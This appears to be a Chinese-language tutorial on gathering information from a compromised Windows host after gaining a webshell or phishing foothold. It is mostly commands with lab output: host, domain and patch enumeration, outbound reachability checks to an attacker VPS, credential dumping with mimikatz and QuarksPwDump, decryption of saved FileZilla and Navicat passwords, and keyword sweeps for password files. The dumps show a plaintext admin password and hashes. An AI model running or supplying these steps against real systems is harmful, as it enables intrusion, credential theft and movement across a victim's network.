如何使用单机信息收集
这篇文章主要介绍"如何使用单机信息收集",在日常操作中,相信很多人在如何使用单机信息收集问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"如何使用单机信息收集"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
思考
当我们获得一个webshell、或者通过钓鱼等等获得初始访问权后,在进一步渗透之前,我们有必要先收集一下当前机的信息,不单单是当前机的配置信息。
下面主要思考以下几个问题:
收集那些信息?
怎么收集这些信息?
为什么收集这些信息(有啥用,在哪用)?
解题
收集信息列表
本机配置信息-网络配置、是否域、系统配置、出网、端口连接信息、服务、进程、已安装软件、host文件、环境变量
账号密码 -本机账号密码、域内其他账号、数据库密码、SSH密码、远程登陆密码、WIFI密码、服务配置文件密码、备份文件密码等等
其他信息- 浏览器历史+书签、常用位置等等
收集方法及作用
本机配置信息
1. 网络配置
[ ip、网关、掩码、dns后缀] :主要用来配置一些网络信息,方便通道构建、了解当前网段大小
ipconfig /all
PS C:\Users\Administrator> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WIN-DC 主 DNS 后缀 . . . . . . . . . . . : langke.org 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表 . . . . . . . . : langke.org以太网适配器 Ethernet0: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆网络连接 物理地址. . . . . . . . . . . . . : 00-0C-29-95-22-43 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::ed4c:c67:a2b6:7a38(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.4.3(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 301993001 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43 DNS 服务器 . . . . . . . . . . . : ::1 TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{9A2D7433-2455-4F1A-9314-BBC3C6939A99}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是
[DNS缓存]
ipconfig /displaydns
PS C:\Users\Administrator> ipconfig /displaydnsWindows IP 配置 _ldap._tcp.win-dc.langke.org ---------------------------------------- 名称不存在。 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org ---------------------------------------- 记录名称. . . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org 记录类型. . . . . . . : 5 生存时间. . . . . . . : 144 数据长度. . . . . . . : 8 部分. . . . . . . . . : 答案 CNAME 记录 . . . . . : win-dc.langke.org isatap ---------------------------------------- 名称不存在。 wpad ---------------------------------------- 名称不存在。 _ldap._tcp.default-first-site-name._sites.win-dc.langke.org ---------------------------------------- 名称不存在。
[路由表]
route print
PS C:\Users\Administrator> route print===========================================================================接口列表 12...00 0c 29 95 22 43 ......Intel(R) 82574L 千兆网络连接 1...........................Software Loopback Interface 1 13...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2===========================================================================IPv4 路由表===========================================================================活动路由:网络目标 网络掩码 网关 接口 跃点数 127.0.0.0 255.0.0.0 在链路上 127.0.0.1 306 127.0.0.1 255.255.255.255 在链路上 127.0.0.1 306 127.255.255.255 255.255.255.255 在链路上 127.0.0.1 306 192.168.4.0 255.255.255.0 在链路上 192.168.4.3 266 192.168.4.3 255.255.255.255 在链路上 192.168.4.3 266 192.168.4.255 255.255.255.255 在链路上 192.168.4.3 266 224.0.0.0 240.0.0.0 在链路上 127.0.0.1 306 224.0.0.0 240.0.0.0 在链路上 192.168.4.3 266 255.255.255.255 255.255.255.255 在链路上 127.0.0.1 306 255.255.255.255 255.255.255.255 在链路上 192.168.4.3 266===========================================================================永久路由: 无IPv6 路由表===========================================================================活动路由: 接口跃点数网络目标 网关 1 306 ::1/128 在链路上 12 266 fe80::/64 在链路上 12 266 fe80::ed4c:c67:a2b6:7a38/128 在链路上 1 306 ff00::/8 在链路上 12 266 ff00::/8 在链路上===========================================================================永久路由: 无
[arp表] :获取arp缓存记录,发现内网中更多的存活主机。
arp -a
PS C:\Users\Administrator> arp -a接口: 192.168.4.3 --- 0xc Internet 地址 物理地址 类型 192.168.4.100 00-0c-29-11-83-25 动态 192.168.4.101 00-0c-29-dd-e4-ef 动态 192.168.4.255 ff-ff-ff-ff-ff-ff 静态 224.0.0.22 01-00-5e-00-00-16 静态 224.0.0.252 01-00-5e-00-00-fc 静态
2. 是否域
[主机名、域信息]:看当前主机是否在域内,如果在域内,进一步收集当前域信息。
net config workstation
PS C:\Users\Administrator> net config workstation计算机名 \\WIN-DC计算机全名 WIN-DC.langke.org用户名 Administrator工作站正运行于 NetBT_Tcpip_{9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243)软件版本 Windows Server 2012 R2 Standard工作站域 LANGKE工作站域 DNS 名称 langke.org登录域 LANGKECOM 打开超时 (秒) 0COM 发送计数 (字节) 16COM 发送超时 (毫秒) 250命令成功完成。
3. 系统配置
[系统名称、版本、位数、启动时间、是否虚拟机及虚拟机类型]:了解系统的基本信息,主要是方便工具的选择,还有不同版本Windows的变更。比如:2012版后默认无法读取明文密码,只能读取密码hash或更改注册表并重启才能读取密码。
systeminfo
PS C:\Users\Administrator> systeminfo主机名: WIN-DCOS 名称: Microsoft Windows Server 2012 R2 StandardOS 版本: 6.3.9600 暂缺 Build 9600OS 制造商: Microsoft CorporationOS 配置: 主域控制器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织:产品 ID: 00252-70000-00000-AA581初始安装日期: 2019/10/21, 23:12:01系统启动时间: 2020/12/4, 23:36:58系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~ [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~BIOS 版本: Phoenix Technologies LTD 6.00, 2018/4/13Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 2,047 MB可用的物理内存: 846 MB虚拟内存: 最大值: 6,655 MB虚拟内存: 可用: 5,255 MB虚拟内存: 使用中: 1,400 MB页面文件位置: C:\pagefile.sys域: langke.org登录服务器: \\WIN-DC修补程序: 安装了 110 个修补程序。 [01]: KB2894852 [02]: KB2894856 [03]: KB2919355 · · ·网卡: 安装了 1 个 NIC。 [01]: Intel(R) 82574L 千兆网络连接 连接名: Ethernet0 启用 DHCP: 否 IP 地址 [01]: 192.168.4.3 [02]: fe80::ed4c:c67:a2b6:7a38Hyper-V 要求: 已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。
4. 是否出网
[TCP、ICMP、UDP、DNS]:了解主机是否可以连接外网、主要为了配合代理搭建、数据导出等等
telnet vps_ip 80
ping vps_ip
nc -u vps_ip 53
nslookup www.baidu.com
5. 端口连接信息
[开放端口、连接信息]:主要用来收集端口开放情况,方便进一步渗透,比如: 3389端口,可以直接去连接桌面,1433端口,可以去进一步收集信息。
netstat -ano
C:\Users\lisi>netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 728 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:554 0.0.0.0:0 LISTENING 2992 TCP 0.0.0.0:2869 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:10243 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 400 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 780 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 948 TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING 504 TCP 0.0.0.0:64849 0.0.0.0:0 LISTENING 512 TCP 192.168.4.101:139 0.0.0.0:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 728 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:554 [::]:0 LISTENING 2992 TCP [::]:2869 [::]:0 LISTENING 4 TCP [::]:5357 [::]:0 LISTENING 4 TCP [::]:10243 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 400 TCP [::]:49153 [::]:0 LISTENING 780 TCP [::]:49154 [::]:0 LISTENING 948 TCP [::]:49159 [::]:0 LISTENING 504 TCP [::]:64849 [::]:0 LISTENING 512 UDP 0.0.0.0:123 *:* 596 UDP 0.0.0.0:3702 *:* 1456 UDP 0.0.0.0:3702 *:* 1456 UDP 0.0.0.0:5004 *:* 2992 UDP 0.0.0.0:5005 *:* 2992 UDP 0.0.0.0:5355 *:* 1052 UDP 0.0.0.0:55527 *:* 1456 UDP 127.0.0.1:1900 *:* 1456 UDP 127.0.0.1:55529 *:* 512 UDP 127.0.0.1:55531 *:* 1052 UDP 127.0.0.1:58374 *:* 948 UDP 127.0.0.1:60697 *:* 1456 UDP 192.168.4.101:137 *:* 4 UDP 192.168.4.101:138 *:* 4 UDP 192.168.4.101:1900 *:* 1456 UDP 192.168.4.101:60696 *:* 1456 UDP [::]:123 *:* 596 UDP [::]:3702 *:* 1456 UDP [::]:3702 *:* 1456 UDP [::]:5004 *:* 2992 UDP [::]:5005 *:* 2992 UDP [::]:5355 *:* 1052 UDP [::]:55528 *:* 1456 UDP [::1]:1900 *:* 1456 UDP [::1]:60695 *:* 1456 UDP [fe80::d4b6:7c0:d036:7e77]:1900 *:* 1456 UDP [fe80::d4b6:7c0:d036:7e77]:60694 *:* 1456
6. 补丁
[补丁网址、ID、日期]:收集系统安装的补丁信息,一般提权时查找对应exp
wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\Users\Administrator>wmic qfe get Caption,Description,HotFixID,InstalledOnCaption Description HotFixID InstalledOnhttp://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 1/27/2020http://support.microsoft.com/?kbid=2621440 Security Update KB2621440 12/4/2020http://support.microsoft.com/?kbid=2653956 Security Update KB2653956 12/4/2020http://support.microsoft.com/?kbid=2943357 Security Update KB2943357 6/24/2020http://support.microsoft.com/?kbid=2999226 Update KB2999226 1/27/2020http://support.microsoft.com/?kbid=3097989 Security Update KB3097989 6/24/2020http://support.microsoft.com/?kbid=4019990 Update KB4019990 12/4/2020http://support.microsoft.com/?kbid=4040980 Update KB4040980 12/4/2020http://support.microsoft.com Update KB958488 2/9/2020http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010
7. 服务
[服务名、模式、路径名]:收集当前系统正在运行的服务,主要看看有没有杀软、监控软件、web服务、数据库服务。
wmic service where (state="running") get caption, name, startmode,pathname
C:\Users\Administrator>wmic service where (state="running") get caption, name, startmode,pathnameCaption Name PathName StartModeActive Directory Web Services ADWS C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe AutoBase Filtering Engine BFE C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork AutoBackground Intelligent Transfer Service BITS C:\Windows\System32\svchost.exe -k netsvcs AutoBackground Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomLaunch AutoComputer Browser Browser C:\Windows\System32\svchost.exe -k netsvcs AutoCOM+ System Application COMSysApp C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} ManualCryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k NetworkService AutoDCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomLaunch AutoDFS Namespace Dfs C:\Windows\system32\dfssvc.exe AutoDFS Replication DFSR C:\Windows\system32\DFSRs.exe AutoDHCP Client Dhcp C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted AutoDHCP Server DHCPServer C:\Windows\system32\svchost.exe -k DHCPServer AutoDiagnostics Tracking Service DiagTrack C:\Windows\System32\svchost.exe -k utcsv ······
8. 进程
[进程名、pid、对应服务]:收集系统当前运行的进程,关注是否有杀软、监控软件、远程管理工具等
tasklist /svc
C:\Users\Administrator>tasklist /svc映像名称 PID 服务========================= ======== ============================================lsass.exe 504 Kdc, Netlogon, NTDS, SamSssvchost.exe 636 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBrokersvchost.exe 680 RpcEptMapper, RpcSsdwm.exe 776 暂缺vmacthlp.exe 796 VMware Physical Disk Helper Servicesvchost.exe 860 Dhcp, EventLog, lmhosts, Wcmsvcsvchost.exe 892 BITS, Browser, DsmSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Themes, Winmgmtsvchost.exe 940 EventSystem, FontCache, netprofm, nsi, W32Timesvchost.exe 1012 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRMsvchost.exe 736 BFE, DPS, MpsSvcspoolsv.exe 1340 SpoolerMicrosoft.ActiveDirectory 1372 ADWSdfsrs.exe 1412 DFSRsvchost.exe 1452 DHCPServersvchost.exe 1472 DiagTrackdns.exe 1488 DNSismserv.exe 1508 IsmServMsDtsSrvr.exe 1724 MsDtsServer110SMSvcHost.exe 1880 NetTcpPortSharingsqlbrowser.exe 1932 SQLBrowsersqlwriter.exe 2000 SQLWriterServerManager.exe 3536 暂缺vmtoolsd.exe 1984 暂缺mmc.exe 1872 暂缺powershell.exe 1428 暂缺conhost.exe 1776 暂缺cmd.exe 1076 暂缺tasklist.exe 3948 暂缺
9. 已安装软件
[软件、版本]:此命令收集的已安装软件可能不全,不过可以大概了解已安装的软件信息。可以用来提权和留后门。比如之前的某狗输入法依赖等。
wmic product get name,version
C:\Users\Administrator>wmic product get name,versionName VersionMicrosoft Application Error Reporting 12.0.6012.5000Microsoft SQL Server System CLR Types 10.51.2500.0SQL Server 2012 Client Tools 11.0.2100.60Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 9.0.30729.4974SQL Server 2012 Documentation Components 11.0.2100.60Microsoft SQL Server 2012 数据层应用程序框架 11.0.2100.60SQL Server 2012 Master Data Services 11.0.2100.60Microsoft SQL Server 2012 Native Client 11.0.2100.60SQL Server 2012 Database Engine Services 11.0.2100.60Microsoft System CLR Types for SQL Server 2012 11.0.2100.60Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219SQL Server 2012 Distributed Replay 11.0.2100.60Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810 14.12.25810Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219Microsoft SQL Server 2012 管理对象 11.0.2100.60VMware Tools 10.3.2.9925305SQL Server 2012 Integration Services 11.0.2100.60Microsoft VSS Writer for SQL Server 2012 11.0.2100.60Visual Studio 2010 Prerequisites - English 10.0.40219SQL Server 2012 Distributed Replay 11.0.2100.60
10. hosts
[host文件]:系统的host配置,可能会收集到一些隐藏资产
C:\Windows\System32\drivers\etc\hosts
C:\Users\Administrator>type C:\Windows\System32\drivers\etc\hosts# Copyright (c) 1993-2009 Microsoft Corp.## This is a sample HOSTS file used by Microsoft TCP/IP for Windows.## This file contains the mappings of IP addresses to host names. Each# entry should be kept on an individual line. The IP address should# be placed in the first column followed by the corresponding host name.# The IP address and the host name should be separated by at least one# space.## Additionally, comments (such as these) may be inserted on individual# lines or following the machine name denoted by a '#' symbol.## For example:## 102.54.94.97 rhino.acme.com # source server# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.# 127.0.0.1 localhost# ::1 localhost
11. 环境变量
[环境变量]:收集系统的环境变量,主要看有哪些可使用的脚本、程序等
path
C:\Users\Administrator>pathPATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\110\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\ManagementStudio\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\;C:\Program Files (x86)\Microsoft SQL Server\110\DTS\Binn\
12. 防火墙配置规则
[防火墙规则]:收集系统的防火墙配置规则,查看出入网配置情况。
netsh firewall show config
C:\Users\Administrator>netsh firewall show config域 配置文件配置:-------------------------------------------------------------------操作模式 = 禁用例外模式 = 启用多播/广播响应模式 = 启用通知模式 = 禁用域 配置文件的服务配置文件:模式 自定义 名称-------------------------------------------------------------------启用 否 文件和打印机共享域 配置文件的允许的程序配置:模式 流量方向 名称/程序-------------------------------------------------------------------域 配置文件的端口配置:端口 协议 流量方向 名称-------------------------------------------------------------------1688 TCP 启用 入站 HEU_KMS_Service······
账号密码
1. 本机账号密码
本机用户
net user
C:\Users\Administrator>net user\\WIN-DC 的用户帐户-------------------------------------------------------------------------------Administrator Guest johnkrbtgt lisi命令成功完成。
在线用户
query user
C:\Users\Administrator>query user 用户名 会话名 ID 状态 空闲时间 登录时间>administrator console 1 运行中 无 2020/12/4 23:38
密码
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
c:\Users\lisi\Desktop>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit .#####. mimikatz 2.2.0 (x64) #17763 Mar 25 2019 01:42:05 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege '20' OKmimikatz(commandline) # logUsing 'mimikatz.log' for logfile : OKmimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 1931626 (00000000:001d796a)Session : Interactive from 2User Name : administratorDomain : LANGKELogon Server : WIN-DCLogon Time : 2020/12/5 0:20:14SID : S-1-5-21-2022301354-2747916058-908538118-500 msv : [00000003] Primary * Username : Administrator * Domain : LANGKE * LM : 629ea9eacefe7125c187b8085fe1d9df * NTLM : 2723e394bfa34a878b638852b4e37335 * SHA1 : 87af129263c193d09d6cade355c50a2d415cabe7 tspkg : * Username : Administrator * Domain : LANGKE * Password : 2wsx@WSX wdigest : * Username : Administrator * Domain : LANGKE * Password : 2wsx@WSX kerberos : * Username : administrator * Domain : LANGKE.ORG * Password : 2wsx@WSX ssp : credman :Authentication Id : 0 ; 630324 (00000000:00099e34)Session : Interactive from 2User Name : lisiDomain : LANGKELogon Server : WIN-DCLogon Time : 2020/12/4 23:45:44SID : S-1-5-21-2022301354-2747916058-908538118-1116
hash
QuarksPwDump.exe
// 本机hashC:\Users\Administrator\Desktop>QuarksPwDump.exe -dhl[+] Setting BACKUP and RESTORE privileges...[OK][+] Parsing SAM registry hive...[OK][+] BOOTKEY retrieving...[OK]BOOTKEY = D61E03DA80125215915636F578505991--------------------------------------------- BEGIN DUMP --------------------------------------------Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE:::---------------------------------------------- END DUMP ---------------------------------------------2 dumped accounts// 域hashC:\Users\Administrator\Desktop>QuarksPwDump.exe -dhdc[+] SYSKEY restrieving...[OK]SYSKEY = 20242EE7E4AABBF78F48427B90233C50[+] Setting BACKUP and RESTORE privileges...[OK][+] Parsing SECURITY registry hive...[OK][+] LSAKEY(s) retrieving...[OK]LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1[+] NLKM retrieving...[OK]NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440DF911AF41239E7DA82A313No cached domain password found!
2. 域内其他账号
域用户
net user /domain
C:\Users\Administrator\Desktop>net user /domain\\WIN-DC 的用户帐户-------------------------------------------------------------------------------Administrator Guest johnkrbtgt lisi命令成功完成。
当前域在线机器
net view
C:\Users\Administrator\Desktop>net view服务器名称 注解-------------------------------------------------------------------------------\\WIN-DC\\WIN-OA41MD9F1FJ命令成功完成。
当前域中的域管
net group "domain admins" /domain
C:\Users\Administrator\Desktop>net group "domain admins" /domain组名 Domain Admins注释 指定的域管理员成员-------------------------------------------------------------------------------Administrator命令成功完成。
3. 数据库中的密码
[Mysql]
select name,password from mysql.user
[MSSQL]
SELECT name, password_hash FROM master.sys.sql_logins;
4. 浏览器保存密码、远程登陆密码、Windows系统保存的凭证、WIFI密码等
lazagne.exe
5. FileZilla中保存的信息
[主机、端口、账号、密码]
type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"
C:\Users\Administrator>type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"C:\Users\john\AppData\Roaming\FileZilla\ 21 C:\Users\john\ 127.0.0.1 21 admin MTIzNDU2Nzg=
6. 管理工具中保存的信息
Navicat
[Mysql、MSSQL、Oracle、SQLite、MariaDB、PostgreSQL]:主机、端口、账号都是明文,密码为自定义加密,网上有解密脚本。
MySQL:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
Microsoft SQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\
// 查看保存有那些数据库的账号密码C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /f NavicatHKEY_CURRENT_USER\Software\PremiumSoft\NavicatHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQLHKEY_CURRENT_USER\Software\PremiumSoft\NavicatOraHKEY_CURRENT_USER\Software\PremiumSoft\NavicatPGHKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremiumHKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite搜索结束: 找到 8 匹配。// 查看用户名C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f UserName /eHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122 UserName REG_SZ rootHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123 UserName REG_SZ root// 查看密码hashreg query HKCU\Software\PremiumSoft /s /f Pwd /eC:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f Pwd /eHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122 Pwd REG_SZHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123 Pwd REG_SZ 5658213BB7E6B3
https://github.com/HyperSine/how-does-navicat-encrypt-password
C:\Users\Administrator>navicat-encrypt-password\python3>python3 NavicatCryptoHelper.py -d 5658213BB7E6B3root!@#
TeamViewer、Xshell、VNC、Winscp、FoXMail等等
5. 文件中保存的账号密码
[文件名]:
dir /s /b "*密码*" "*登录*" "*资产*" "*VPN*" "*Svn*" "*Git*" "*交接*" "*离职*" "*网络*" "*后台*" "*拓扑*" "*邮箱*" "*工资*" "*管理员*" "*巡检*" "*备份*"
[文件内容]:从后缀为*.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi的文件中搜索包含"user=" "pass=" "login=" "uid=" "pwd="等关键字的行
findstr /I /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd=" /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi
其他信息
1. 浏览器历史+书签
[Chrome 书签]:json格式
C:\Users\当前用户名\AppData\Local\Google\Chrome\User Data\Guest Profile\Bookmarks
[Chrome 历史记录]:SQLite格式,无密码。
C:\Users\当前用户名\AppData\Local\Google\Chrome\User Data\Default\History
Firefox、IE、Safar等等
工具:http://www.nirsoft.net
2. 常用位置文件列表
[桌面、下载]:大概率会有惊喜
dir c:%HOMEPATH%\Desktop
dir c:%HOMEPATH%\Download
到此,关于"如何使用单机信息收集"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!